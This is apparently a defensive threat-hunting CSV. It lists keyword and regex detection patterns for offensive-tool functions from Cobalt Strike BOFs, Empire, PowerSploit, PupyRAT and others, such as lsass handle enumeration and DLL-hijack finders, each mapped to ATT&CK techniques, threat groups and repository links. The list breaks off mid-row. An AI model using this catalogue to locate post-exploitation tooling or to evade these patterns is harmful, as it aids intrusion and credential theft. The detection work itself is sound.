"*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","45080"
"*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","45081"
"*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45082"
"*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45083"
"*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45084"
"*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","45085"
"*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","45086"
"*Find-LocalAdminAccess.ps1*",".{0,1000}Find\-LocalAdminAccess\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","45087"
"*Find-LogonScriptCredentials -LogonScripts*",".{0,1000}Find\-LogonScriptCredentials\s\-LogonScripts.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","45088"
"*Find-LogonScriptCredentials.ps1*",".{0,1000}Find\-LogonScriptCredentials\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","45089"
"*FindModule *.dll*",".{0,1000}FindModule\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/FindObjects-BOF","1","0","N/A","N/A","10","10","268","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z","45090"
"*FindObjects-BOF*",".{0,1000}FindObjects\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","N/A","10","10","268","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z","45091"
"*Find-PathDLLHijack*",".{0,1000}Find\-PathDLLHijack.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45092"
"*Find-PathDLLHijack*",".{0,1000}Find\-PathDLLHijack.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","45093"
"*Find-PathDLLHijack*",".{0,1000}Find\-PathDLLHijack.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45094"
"*Find-PathHijack*",".{0,1000}Find\-PathHijack.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45095"
"*Find-PotentiallyCrackableAccounts.json*",".{0,1000}Find\-PotentiallyCrackableAccounts\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","45096"
"*Find-ProcessDLLHijack*",".{0,1000}Find\-ProcessDLLHijack.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45097"
"*Find-ProcessDLLHijack*",".{0,1000}Find\-ProcessDLLHijack.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","45098"
"*Find-ProcessDLLHijack*",".{0,1000}Find\-ProcessDLLHijack.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45099"
"*FindProcessTokenAndDuplicate*",".{0,1000}FindProcessTokenAndDuplicate.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","45100"
"*FindProcHandle *lsass*",".{0,1000}FindProcHandle\s.{0,1000}lsass.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/FindObjects-BOF","1","0","N/A","N/A","10","10","268","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z","45101"
"*Find-ProtectionSoftware*",".{0,1000}Find\-ProtectionSoftware.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","45102"
"*Find-PSScriptsInPSAppLog*",".{0,1000}Find\-PSScriptsInPSAppLog.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - 